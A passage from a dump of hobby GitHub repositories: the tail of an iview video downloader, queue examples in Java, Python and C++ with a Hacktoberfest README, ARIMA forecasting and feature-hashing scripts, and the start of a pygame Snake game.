self.listing[0]['f']\n\n\nclass SeriesView:\n\tdef __init__(self, root, url):\n\t\tself.master = root\n\t\tself.frame = Tkinter.Frame(root)\n\t\troot.geometry(\"{}x{}\".format(800,600))\n\t\tself.entryText = Tkinter.StringVar()\n\t\tentry = Tkinter.Entry(self.frame, textvariable=self.entryText, width=200, state=Tkinter.DISABLED)\n\t\tchangedirbutton = Tkinter.Button(self.frame, text=\"Change\", command=self.changeDirectory)\n\t\tscrollbar = Tkinter.Scrollbar(self.frame, orient=\"vertical\")\n\t\tlistbox = Tkinter.Listbox(self.frame, width=800, height=600,selectmode=Tkinter.SINGLE, yscrollcommand=scrollbar.set)\n\t\tlistbox.bind('<Double-Button-1>',self.callback )\n\t\tscrollbar.config(command=listbox.yview)\n\t\tlisting = SeriesListing(url).getListing()\n\t\tself.listing = listing\n\t\tfor item in listing:\n\t\t\tlistbox.insert(Tkinter.END, item['b'])\n\t\tentry.pack()\n\t\tchangedirbutton.pack()\n\t\tscrollbar.pack(side=\"right\", fill=\"y\")\n\t\tlistbox.pack(side=\"left\",fill=\"both\", expand=True)\n\t\tself.frame.pack()\n\n\tdef changeDirectory(self):\n\t\tdirectory = filedialog.askdirectory()\n\t\tself.entryText.set(directory)\n\n\tdef callback(self,event):\n\t\titemnumber = event.widget.curselection()[0]\n\t\titemvalue = event.widget.get(itemnumber)\n\t\tprint(self.listing[itemnumber]['a'])\n\t\tprint(self.listing[itemnumber]['b'])\n\t\tprint(self.listing[itemnumber]['n'])\n\t\tprint(self.listing[itemnumber]['s'])\n\t\tassetid = self.listing[itemnumber]['s'].rsplit('/',1)[1][:13]\n\t\t#print(assetid)\n\t\t#self.downloadVideo(assetid)\n\t\tiviewdownloader.downloadIViewVideo(assetid, self.entryText.get() + '/' + self.listing[itemnumber]['b'] + \".mp4\")\n\n\n\tdef downloadVideo(self,assetid):\n\t\tr = requests.get('https://tviview.abc.net.au/iview/feed/sony/', verify=False);\n\t\tsoup = BeautifulSoup(r.text)\n\t\tassets = soup.find_all('asset')\n\t\tfor asset in assets:\n\t\t\tif (asset.find('id').contents[0] == assetid):\n\t\t\t\turl = asset.find('asseturl').contents[0]\n\t\t\t\tbreak\n\n\t\t#url = assets[1].find('asseturl').contents[0];\n\t\tprint(url)\n\t\trequest = urllib3.PoolManager().urlopen('GET', url, preload_content=False)\n\t\twith open('boo.mp4','wb') as out:\n\t\t\tfilesize = request.getheaders()['content-length']\n\t\t\tblocksize = int(math.ceil(int(filesize)/100.))\n\t\t\tfor progress in range(100):\n\t\t\t\tprint(\"{}%\".format(progress))\n\t\t\t\tout.write(request.read(blocksize))\n\t\tprint(\"100%\")\n\t\trequest.release_conn()\n\n\t\t#print(ids[1].string)\n\t\t#print(assets[1].find('asseturl').contents[0])\n\t\t#print(r.text)\n\n\nif __name__ == '__main__':\n\tpass\n" } ]
5
adinimbarte/Queue
https://github.com/adinimbarte/Queue
07c416d49bf71e6daa7abdea66da2fb671b18828
ac08bbd45eec8c6753820ebfae40a3fec4469009
cd7545bfe7f69f5d56b4f40064d5624ed98ff709
refs/heads/main
2023-08-05T15:19:13.291573
2021-10-04T16:29:26
2021-10-04T16:29:26
412,441,515
1
10
null
2021-10-01T11:33:27
2021-10-04T09:30:17
2021-10-04T16:29:26
C++
[ { "alpha_fraction": 0.6863194108009338, "alphanum_fraction": 0.6971951723098755, "avg_line_length": 31.370370864868164, "blob_id": "657aa5ed9ddb0fd0a8fb5bbf2e72497b77be76f3", "content_id": "6f2fd642fb4ecd2e3ee7a4355e3b3f6507d6a2ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1747, "license_type": "no_license", "max_line_length": 313, "num_lines": 54, "path": "/Queue In Java/queue.java", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "// The Queue interface present in the java.util package and extends the Collection interface is used to hold the elements about to be processed in FIFO(First In First Out) order.\n// It is an ordered list of objects with its use limited to insert elements at the end of the list and deleting elements from the start of the list, (i.e.), it follows the FIFO or the First-In-First-Out principle.\n// Being an interface the queue needs a concrete class for the declaration and the most common classes are the PriorityQueue and LinkedList in Java.It is to be noted that both the implementations are not thread safe. PriorityBlockingQueue is one alternative implementation if thread safe implementation is needed.\n// Declaration: The Queue interface is declared as:\n// Java program to demonstrate a Queue\n\nimport java.util.LinkedList;\nimport java.util.Queue;\n\npublic class QueueExample {\n\n\tpublic static void main(String[] args)\n\t{\n\t\tQueue<Integer> q\n\t\t\t= new LinkedList<>();\n\n\t\t// Adds elements {0, 1, 2, 3, 4} to\n\t\t// the queue\n\t\tfor (int i = 0; i < 5; i++)\n\t\t\tq.add(i);\n\n\t\t// Display contents of the queue.\n\t\tSystem.out.println(\"Elements of queue \"\n\t\t\t\t\t\t+ q);\n\n\t\t// To remove the head of queue.\n\t\tint removedele = q.remove();\n\t\tSystem.out.println(\"removed element-\"\n\t\t\t\t\t\t+ removedele);\n\n\t\tSystem.out.println(q);\n\n\t\t// To view the head of queue\n\t\tint head = q.peek();\n\t\tSystem.out.println(\"head of queue-\"\n\t\t\t\t\t\t+ head);\n\n\t\t// Rest all methods of collection\n\t\t// interface like size and contains\n\t\t// can be used with this\n\t\t// implementation.\n\t\tint size = q.size();\n\t\tSystem.out.println(\"Size of queue-\"\n\t\t\t\t\t\t+ size);\n\t}\n}\n\n\n// OUTPUT:\n// Elements of queue [0, 1, 2, 3, 4]\n// removed element-0\n// [1, 2, 3, 4]\n// head of queue-1\n// Size of queue-4" }, { "alpha_fraction": 0.7017995119094849, "alphanum_fraction": 0.7043702006340027, "avg_line_length": 18.299999237060547, "blob_id": "55564c3282e5975e60d5b0712e0c2e779997d5c0", "content_id": "048cd61ac16dfce9a007671f5a6879a5ebcb1c62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/Python/Queue.py", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "from queue import Queue\n \n# Initializing a queue\nqueue = Queue(maxsize = 5)\n \nprint(queue.qsize())\n \n# Adding of element to queue\nqueue.put('apples')\nqueue.put('banana')\nqueue.put('carrot')\n \n# Removing element from queue\nprint(\"\\nElements dequeued from the queue\")\nprint(queue.get())\nprint(queue.get())\nprint(queue.get())\n \n# Return Boolean for Empty\nprint(\"\\nEmpty: \", queue.empty())\n \n " }, { "alpha_fraction": 0.6779381632804871, "alphanum_fraction": 0.6931958794593811, "avg_line_length": 32.69444274902344, "blob_id": "76b893937a0d9900804464a05250dd6e9ca94401", "content_id": "318c265085136637e428f707a6ff6802aebb2ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 232, "num_lines": 72, "path": "/Queue in C++/queue.cpp", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "// Introduction to Queue\n// Queues are a type of container adaptors which operate in a first in first out (FIFO) type of arrangement. Elements are inserted at the back (end) and are deleted from the front. Queues use an encapsulated object of deque or list \n// (sequential container class) as its underlying container, providing a specific set of member functions to access its elements.\n\n\n/*\nMethods of Priority Queue :\n1. empty() – This method checks whether the priority_queue container is empty or not. If it is empty, return true, else false. It does not take any parameter.\nsyntax : p1.empty() \n2.size() – This method gives the number of elements in the priority queue container. It returns the size in an integer. It does not take any parameter.\nsyntax : p2.size() \n3. push() – This method inserts the element into the queue. Firstly, the element is added to the end of the queue, and simultaneously elements reorder themselves with priority. It takes value in the parameter.\nsyntax : p3.push(value) \n4.pop() – This method delete the top element (highest priority) from the priority_queue. It does not take any parameter.\nsyntax : p3.pop()\n5.swap() – This method swaps the elements of a priority_queue with another priority_queue of the same size and type. It takes the priority queue in a parameter whose values need to be swapped.\nsyntax : p3.swap(p1) \n6.top() – This method gives the top element from the priority queue container. It does not take any parameter.\nsyntax : p3.top() \n7.emplace() – This method adds a new element in a container at the top of the priority queue. It takes value in a parameter.\nsyntax : p3.emplace(value) \n\n*/\n// Queue in Standard Template Library (STL)\n#include <iostream>\n#include <queue>\n\nusing namespace std;\n\n// Print the queue\nvoid showq(queue<int> gq)\n{\n\tqueue<int> g = gq;\n\twhile (!g.empty()) {\n\t\tcout << '\\t' << g.front();\n\t\tg.pop();\n\t}\n\tcout << '\\n';\n}\n\n// Driver Code\nint main()\n{\n\tqueue<int> gquiz;\n\tgquiz.push(10);\n\tgquiz.push(20);\n\tgquiz.push(30);\n\n\tcout << \"The queue gquiz is : \";\n\tshowq(gquiz);\n\n\tcout << \"\\ngquiz.size() : \" << gquiz.size();\n\tcout << \"\\ngquiz.front() : \" << gquiz.front();\n\tcout << \"\\ngquiz.back() : \" << gquiz.back();\n\n\tcout << \"\\ngquiz.pop() : \";\n\tgquiz.pop();\n\tshowq(gquiz);\n\n\treturn 0;\n}\n\n/* Output: \nThe queue gquiz is : 10 20 30\n\ngquiz.size() : 3\ngquiz.front() : 10\ngquiz.back() : 30\ngquiz.pop() : 20 30\n\n\n*/" }, { "alpha_fraction": 0.47593581676483154, "alphanum_fraction": 0.5037432909011841, "avg_line_length": 10.390243530273438, "blob_id": "1cfcf6bf6568f9fd4e48b631430bd8c9bd82d1f1", "content_id": "8f2a6de15bf4706de4b8106b02bd7433e7947004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 935, "license_type": "no_license", "max_line_length": 55, "num_lines": 82, "path": "/Queue in C++/Q_2stacks.cpp", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "\n/* \ncpp program to implement queue using two stacks.\nTime complexities:\nenqueue : O(n)\ndequeue : O(1)\ndisplay : O(n)\n*/\n\n#include<bits/stdc++.h>\n#include<iostream>\nusing namespace std;\n\n\nclass Queue{\n\tpublic:\n\t\tstack<int>s1;\n\t\tstack<int>s2;\n\t\t\n\t\tvoid enqueue(int n)\n\t\t{\n\t\t\twhile(!s1.empty())\n\t\t\t{\n\t\t\t\ts2.push(s1.top());\n\t\t\t\ts1.pop();\t\n\t\t\t}\t\n\t\t\t\n\t\t\ts1.push(n);\n\t\t\twhile(!s2.empty())\n\t\t\t{\n\t\t\t\ts1.push(s2.top());\n\t\t\t\ts2.pop();\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid dequeue()\n\t\t{\n\t\t\tif(s1.empty())\n\t\t\t{\n\t\t\t\tcout<<\"queue already empty, invalid operation\\n\\n\";\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\n\t\t\ts1.pop();\n\t\t\t\n\t\t}\n\t\t\n\t\tvoid display()\n\t\t{\n\t\t\twhile(!s1.empty())\n\t\t\t{\n\t\t\t\tcout<<s1.top()<<\" \";\n\t\t\t\ts2.push(s1.top());\n\t\t\t\ts1.pop();\n\t\t\t}\n\t\t\t\n\t\t\tcout<<endl;\n\t\t\t\n\t\t\t\n\t\t\twhile(!s2.empty())\n\t\t\t{\n\t\t\t\ts1.push(s2.top());\n\t\t\t\ts2.pop();\n\t\t\t}\n\t\t}\n\t\t\n\t\t\n};\n\n\n\nint main()\n{\n\tQueue q;\n\t\n\t// sample runs\n\tq.enqueue(2);\n\tq.enqueue(3);\n\tq.display();\n\tq.dequeue();\n\tq.display();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.699907660484314, "alphanum_fraction": 0.7165281772613525, "avg_line_length": 23.636363983154297, "blob_id": "6ed01538fd73cad84546d58cd63f728529a14872", "content_id": "5d134bbaa2a1e141b5712ce8fcddad9e306efe39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1083, "license_type": "no_license", "max_line_length": 103, "num_lines": 44, "path": "/README.md", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "# Queue\n# HacktoberFest 2021\n\n## This repo will be partcipating in the [Hacktoberfest](https://hacktoberfest.digitalocean.com/) 2021.\n\n![](https://hacktoberfest.digitalocean.com/_nuxt/img/logo-hacktoberfest-full.f42e3b1.svg)\n\n<h4>Readme Credit goes to <a href=\"https://github.com/adinimbarte\">@adinimbarte</a> </h3>\n <br>\n\n\nThis is a beginners repository for anyone wishing to contribute to HacktoberFest 2021\n\n - Fork the repository\n - Clone your fork and Create a new branch\n - Add your program\n - Generate your Pull Request\n - Magic\n\n### Important Note:\nPlease commit your files in the respective folders. \n\nEx:- `.py` files must go in `python/` folder and others in `misc` folder.\n\n### Process\n< Added Unique program > // please change this accordingly\n\n```sh\n$ git clone <URL>\n$ cd <FolderName>\n$ git branch <new_branch>\n$ git checkout <new_branch>\n```\n\nAdd your Program\n\n```sh\n$ git add .\n$ git commit -m \"<Commit MESSAGE>\"\n$ git push origin <new_branch>\n```\nGo and Generate your first Pull request from Github\n\n### THANKS A LOT FOR YOUR SUPPORT!! REALLY HELPS ME A LOT!" } ]
5
Sandy4321/Feature_Engineering
https://github.com/Sandy4321/Feature_Engineering
a6103170af487e323b657d51f939b9942865f92a
306846f17daaae097adfeafee518439743c2e79f
d1688c5827a14c9e3703d49ce75f7d4b00695f56
refs/heads/master
2021-01-24T23:24:37.764794
2015-03-07T05:48:10
2015-03-07T05:48:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5535783171653748, "alphanum_fraction": 0.5678916573524475, "avg_line_length": 31.721519470214844, "blob_id": "37d7ce145a8106b74d6456a137ace12f03e40d66", "content_id": "98e2e1d29075cd7bf2ce59f16440c32b35e42bd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "no_license", "max_line_length": 147, "num_lines": 79, "path": "/Hashing_Trick/hashing_trick.py", "repo_name": "Sandy4321/Feature_Engineering", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\n# Usage: 'python hashing_trick.py path_to_data [flag]'\n# The format of the data should be the same as libsvm\n# Flag:\n# 1(default) unsigned_hashing\n# 2 signed_hashing\n# 3 multiple_hashing\n\nclass hashing_trick:\n '''\n\n Hashing trick is used to decrease the feature dimension such that the features can be stored into memory.\n\n Parameters\n ----------\n \n path : string, \n Input path of data with format like libsvm\n\n N : int, optional(default 10000)\n The feature dimension after being hashed\n\n flag : int, optional(default 1)\n The flag tells which kind of hashing trick algorithm is used\n 1: unsigned hashing\n 2: signed hashing\n 3: multiple hashing\n\n '''\n \n def __init__(self, path, N, flag):\n self.path = path\n self.N = N\n self.flag = flag\n self.res_lst = []\n\n def hash_features(self):\n for line in open(self.path):\n row = line.strip().split(' ')\n d = {}\n if self.flag == 1:\n d = self.unsigned_hashing(row[1:])\n elif self.flag == 2:\n d = self.signed_hashing(row[1:])\n elif self.flag == 3:\n d = self.multiple_hashing(row[1:])\n sort = sorted(d.iteritems(), key = lambda dd: dd[0])\n self.res_lst.append([row[0], sort])\n for res in self.res_lst:\n print res\n\n def unsigned_hashing(self, lst):\n d = {}\n for l in lst:\n (index, value) = map(float, l.split(':'))\n index_hashed = hash('feature' + str(index)) % self.N\n d.setdefault(index_hashed, 0.0)\n d[index_hashed] += value\n return d\n\n\n def signed_hashing(self, lst):\n d = {}\n for l in lst:\n (index, value) = map(float, l.split(':'))\n index_hashed = hash('feature' + str(index)) % self.N\n sign = hash('sign' + str(index)) % 2\n d.setdefault(index_hashed, 0.0)\n d[index_hashed] += (2 * sign - 1) * value\n return d\nparser = argparse.ArgumentParser(description = 'Options for this script')\nparser.add_argument('-i', dest = 'path_input', help = 'input path')\nparser.add_argument('-N', default = 10000, type = int, help = 'number of indexes after hashing')\nparser.add_argument('-f', dest = 'flag', default = 1, type = int, help = 'flag, 1 is unsigned hashing, 2 is signed hashing, 3 is multiple hashing')\n\nargs = parser.parse_args(sys.argv[1:])\nht = hashing_trick(args.path_input, args.N, args.flag)\nht.hash_features()\n" } ]
1
VasilievArtyom/MLwarrior
https://github.com/VasilievArtyom/MLwarrior
9240e2f276382e2a2c05b985ecee9abc4f0f55ae
f9ba3b215746ae63c1cc3a21fd20718e59315a0c
bc0ed05a1dac8eed8dc1ad03e8ed333a2cea83f8
refs/heads/master
2021-02-05T15:16:55.198811
2020-03-02T17:24:42
2020-03-02T17:24:42
243,797,374
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5808257460594177, "alphanum_fraction": 0.616515040397644, "avg_line_length": 27.390727996826172, "blob_id": "ddf7a8e356efe989c18ed810b5f98caae0d9fc6d", "content_id": "1aa56de5723675a49d1d316849c6bb9ce80c74ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4291, "license_type": "no_license", "max_line_length": 89, "num_lines": 151, "path": "/predict.py", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nfrom numpy import *\nfrom os import path\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport itertools\nimport warnings\n\n\nplt.rc('text', usetex=True)\n\noutpath = \"plots\"\ninpath = \"\"\n\ncurrentfile = \"data.txt\"\n\n# Read from file\nfulln, fullW= np.loadtxt(path.join(inpath, currentfile), usecols=(0, 1), unpack=True)\n\nn = fulln[65:1003]\nW = fullW[65:1003]\n\n\n\n# # fit model\n# p = d = q = range(0, 15)\n# pdq = list(itertools.product(p, d, q))\n# warnings.filterwarnings(\"ignore\")\n# f = open('hyperparam.txt','w') \n# for param in pdq:\n# \ttry:\n# \t\tmodel = sm.tsa.statespace.SARIMAX(W,\n# \t\t\t\t\t\t\t\t\t\t order=param,\n# \t\t\t\t\t\t\t\t\t\t seasonal_order=(0,0,0, 12),\n# \t\t\t\t\t\t\t\t\t\t enforce_stationarity=False,\n# \t\t\t\t\t\t\t\t\t\t enforce_invertibility=False)\n# \t\tresults = model.fit()\n# \t\tprint('ARIMA{} - AIC:{}'.format(param, results.aic), file=f)\n# \texcept:\n# \t\tcontinue\n\n# model = ARIMA(W, order=(p,d,q))\n# model_fit = model.fit(disp=0)\n# print(model_fit.summary())\n# print(model_fit.conf_int(), shape(model_fit.conf_int()))\n\n\n# f, Pxx_den = signal.periodogram(W - np.average(W), window='hamming')\n\n# # Draw QLB p-values plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# # ax.bar(lags[1:-1], pvalues[1:], color='crimson')\n# ax.semilogy(f, Pxx_den, color='crimson')\n# plt.grid()\n# plt.ylabel(r'$\\frac{1}{T} {|X_{T} (i \\omega)|}^2 $')\n# plt.xlabel(r'$\\omega$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# # plt.title(r'Ljung–Box Q test p-values')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"psd.png\"))\n# plt.clf()\n\n\n# final_model = sm.tsa.statespace.SARIMAX(W,\n# \t\t\t\t\t\t\t\t\t\torder=(2, 0, 14),\n# \t\t\t\t\t\t\t\t\t\tseasonal_order=(0,0,0, 12),\n# \t\t\t\t\t\t\t\t\t\tenforce_stationarity=False,\n# \t\t\t\t\t\t\t\t\t\tenforce_invertibility=False)\n# results = final_model.fit()\n# print(results.summary().tables[1])\n\n# pred = results.get_prediction(end=1023, dynamic=False)\n# pred_vals = pred.predicted_mean\n# pred_ci = pred.conf_int()\n\n# extended_n = np.arange(0, 1024, 1)\n\n# # Draw naive prediction plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.scatter(fulln[1003:], pred_vals[1003:], \n# \t\t\tmarker='+',\n# \t\t\tcolor='crimson',\n# \t\t\tlabel='Prediction',\n# \t\t\tzorder=10)\n# ax.fill_between(fulln[1003:],\n# pred_ci[1003:, 0],\n# pred_ci[1003:, 1],\n# facecolor='gainsboro', \n# label='Confidence interval',\n# interpolate=True,\n# zorder=0)\n# ax.plot(fulln[800:], fullW[800:], ls='-', label='Raw signal', zorder=5)\n# plt.grid()\n# plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# # plt.title(r'Ljung–Box Q test p-values')\n# ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"validation.png\"))\n# plt.clf()\n\n\nfinal_model = sm.tsa.statespace.SARIMAX(fullW[65:],\n\t\t\t\t\t\t\t\t\t\torder=(2, 0, 14),\n\t\t\t\t\t\t\t\t\t\tseasonal_order=(0,0,0, 12),\n\t\t\t\t\t\t\t\t\t\tenforce_stationarity=False,\n\t\t\t\t\t\t\t\t\t\tenforce_invertibility=False)\nresults = final_model.fit()\nprint(results.summary().tables[1])\n\npred = results.get_prediction(end=1043, dynamic=False)\npred_vals = pred.predicted_mean\npred_ci = pred.conf_int()\n\nextended_n = np.arange(0, 1044, 1)\n\n# Draw naive prediction plot\nfig, ax = plt.subplots(figsize=(8, 3.8))\nax.scatter(extended_n[1024:], pred_vals[1024:], \n\t\t\tmarker='+',\n\t\t\tcolor='crimson',\n\t\t\tlabel='Prediction',\n\t\t\tzorder=10)\nax.fill_between(extended_n[1024:],\n pred_ci[1024, 0],\n pred_ci[1024:, 1],\n facecolor='gainsboro', \n label='Confidence interval',\n interpolate=True,\n zorder=0)\nax.plot(fulln[800:], fullW[800:], ls='-', label='Raw signal', zorder=5)\nplt.grid()\nplt.ylabel(r'$W_{n}$')\nplt.xlabel(r'$t_n$')\nax.xaxis.grid(b=True, which='both')\nax.yaxis.grid(b=True, which='both')\nax.legend(loc='upper left', frameon=True)\nplt.draw()\nfig.savefig(path.join(outpath, \"prediction.png\"))\nplt.clf()\n\nf = open('prediction.txt','w')\nprint('#timestamp, value, Confidence interval bounds', file=f)\nfor index in range(1024, 1043):\n\tprint(extended_n[index], pred_vals[index], pred_ci[index, 0], pred_ci[index, 1], file=f)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24, "blob_id": "94a834098d774fb97c1a9968f5585451e82d9b79", "content_id": "8eec63e2dd673fa0c281f7fb526c26525c794ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 32, "num_lines": 3, "path": "/README.md", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "# MLwarrior\nTop secret public repository.\nSee report.pdf file for details.\n" }, { "alpha_fraction": 0.601307213306427, "alphanum_fraction": 0.6277777552604675, "avg_line_length": 28.708738327026367, "blob_id": "cda3cc79dd88aacb1067b2d889ecd573c461d169", "content_id": "effb6a1685e79204cc6caffa7a01848b402655e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3066, "license_type": "no_license", "max_line_length": 152, "num_lines": 103, "path": "/analize.py", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nfrom numpy import *\nfrom scipy.optimize import curve_fit\nfrom scipy import signal\nfrom os import path\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.stattools import acf, pacf\n\n\nplt.rc('text', usetex=True)\n\noutpath = \"plots\"\ninpath = \"\"\n\ncurrentfile = \"data.txt\"\n\n# Read from file\nfulln, fullW= np.loadtxt(path.join(inpath, currentfile), usecols=(0, 1), unpack=True)\n\n# # Draw Raw data plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.plot(n, W, ls='-')\n# plt.grid()\n# plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# #plt.title(r'$I(t) = I_0^A (1 - 2 \\exp (\\frac{-t }{T_1^A})) + I_0^B (1 - 2 \\exp (\\frac{-t }{T_1^B}))$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"raw.png\"))\n# plt.clf()\n\nn = fulln[65:1003]\nW = fullW[65:1003]\n\n# # Draw Raw data plot\n# fig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.plot(n, W, ls='-')\n# plt.grid()\n# plt.ylabel(r'$W_{n}$')\n# plt.xlabel(r'$t_n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# #plt.title(r'$I(t) = I_0^A (1 - 2 \\exp (\\frac{-t }{T_1^A})) + I_0^B (1 - 2 \\exp (\\frac{-t }{T_1^B}))$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"raw_cut.png\"))\n# plt.clf()\n\n\n# nlags=200\n# acf_val, confit_val, qstat_val, pvalues = acf(W, unbiased=True, nlags=nlags-1, qstat=True, alpha=.05)\n# lags=np.arange(1, nlags+1, 1)\n\n\n# # Draw acf plot\n# fig, ax = plt.subplots(figsize=(4, 3.8))\n# ax.fill_between(lags[1:], confit_val[1:, 0], confit_val[1:, 1], where=confit_val[1:, 1] >= confit_val[1:, 0], facecolor='gainsboro', interpolate=True)\n# #ax.scatter(lags[1:], acf_val[1:], marker='+', color='crimson')\n# ax.bar(lags[1:], acf_val[1:], color='crimson')\n# plt.grid()\n# #plt.ylabel(r'$r_{\\tau}$')\n# plt.xlabel(r'$\\tau$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# plt.title(r'$r_{\\tau}$')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"acf200.png\"))\n# plt.clf()\n\n# # Draw QLB p-values plot\n# fig, ax = plt.subplots(figsize=(4, 3.8))\n# ax.bar(lags[1:-1], pvalues[1:], color='crimson')\n# plt.grid()\n# # plt.ylabel(r'Ljung–Box Q test p-values')\n# plt.xlabel(r'$n$')\n# ax.xaxis.grid(b=True, which='both')\n# ax.yaxis.grid(b=True, which='both')\n# plt.title(r'Ljung–Box Q test p-values')\n# #ax.legend(loc='best', frameon=True)\n# plt.draw()\n# fig.savefig(path.join(outpath, \"qlb200.png\"))\n# plt.clf()\n\nf, Pxx_den = signal.periodogram(W - np.average(W), window='hamming')\n\n# Draw QLB p-values plot\nfig, ax = plt.subplots(figsize=(8, 3.8))\n# ax.bar(lags[1:-1], pvalues[1:], color='crimson')\nax.semilogy(f, Pxx_den, color='crimson')\nplt.grid()\nplt.ylabel(r'$\\frac{1}{T} {|X_{T} (i \\omega)|}^2 $')\nplt.xlabel(r'$\\omega$')\nax.xaxis.grid(b=True, which='both')\nax.yaxis.grid(b=True, which='both')\n# plt.title(r'Ljung–Box Q test p-values')\n#ax.legend(loc='best', frameon=True)\nplt.draw()\nfig.savefig(path.join(outpath, \"psd.png\"))\nplt.clf()\n" } ]
3
haklir/Snake_42
https://github.com/haklir/Snake_42
a060a08e005efe57585d6a66621aea6b507333f8
f08f18abfb0029cd70bf9ab37dfbeb5580485bd5
8c32548f46d5f4aedc8649d8ecab5992477b594c
refs/heads/master
2020-03-12T20:39:51.278646
2018-09-26T20:01:41
2018-09-26T20:01:41
130,364,163
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6850828528404236, "alphanum_fraction": 0.7071823477745056, "avg_line_length": 29.16666603088379, "blob_id": "26a75501358c25d6c1deef1a576a1a8056443b06", "content_id": "4a6dc1c977beaae1490b75e4ea3344a5e09f39b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 135, "num_lines": 6, "path": "/README.md", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "# Snake_42\nSnake 42 is a simple game\n\nThis game was made with Python using pygame (pygame.org). Simple, 'elegant' and works like a charm! Also, this is a work in progress...\n\n-----\n" }, { "alpha_fraction": 0.4978077709674835, "alphanum_fraction": 0.5165823698043823, "avg_line_length": 35.77070236206055, "blob_id": "e66f8b5511175d40f37a75c2080a013715337b01", "content_id": "5b4cbe6d3db71b446a4ba3e7ed94cadf3436dbfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17790, "license_type": "no_license", "max_line_length": 119, "num_lines": 471, "path": "/snake_42.py", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "\"\"\"\r\n## -------- ##\r\n## SNAKE 42 ##\r\n## -------- ##\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom re import search\r\nfrom random import randint\r\n\r\nfrom pygame.locals import *\r\nimport pygame as pg\r\nimport snake_data as data\r\n\r\n\r\ndef get_settings():\r\n try:\r\n with open(\"settings.txt\") as file:\r\n settings = file.read()\r\n\r\n name = search(r'(?<=name=).*', settings).group()\r\n play_music = False if search(r'(?<=play_music=).*', settings).group() == \"False\" else True\r\n # First eval returns string in form 'data.GREEN_SNAKE'. Second returns actual Surface from data\r\n snake_color = eval(eval(\"search(r'(?<=snake_color=).*', settings).group()\"))\r\n\r\n except FileNotFoundError:\r\n name = data.DEFAULT_NAME\r\n play_music = True\r\n snake_color = data.GREEN_SNAKE\r\n save_settings(name, play_music, \"data.GREEN_SNAKE\")\r\n\r\n return name, play_music, snake_color\r\n\r\n\r\ndef save_settings(name, play_music, snake_color):\r\n \"\"\" Saves selected settings into settings.txt. \"\"\"\r\n if snake_color == data.GREEN_SNAKE:\r\n snake_color_string = \"data.GREEN_SNAKE\"\r\n else:\r\n snake_color_string = \"data.ORANGE_SNAKE\"\r\n\r\n with open(\"settings.txt\", \"w\") as file:\r\n file.write(\r\n f\"name={name}\\n\"\r\n f\"play_music={play_music}\\n\"\r\n f\"snake_color={snake_color_string}\"\r\n )\r\n\r\n\r\nclass Game:\r\n \"\"\"\r\n Game class. Contains methods:\r\n - main_menu(self) -> name, snake_color\r\n - This runs the main menu.\r\n - pause(self) -> Boolean\r\n - Logic for pause control when player presses K_p\r\n - place_food(self) -> None\r\n - Places food on the field\r\n 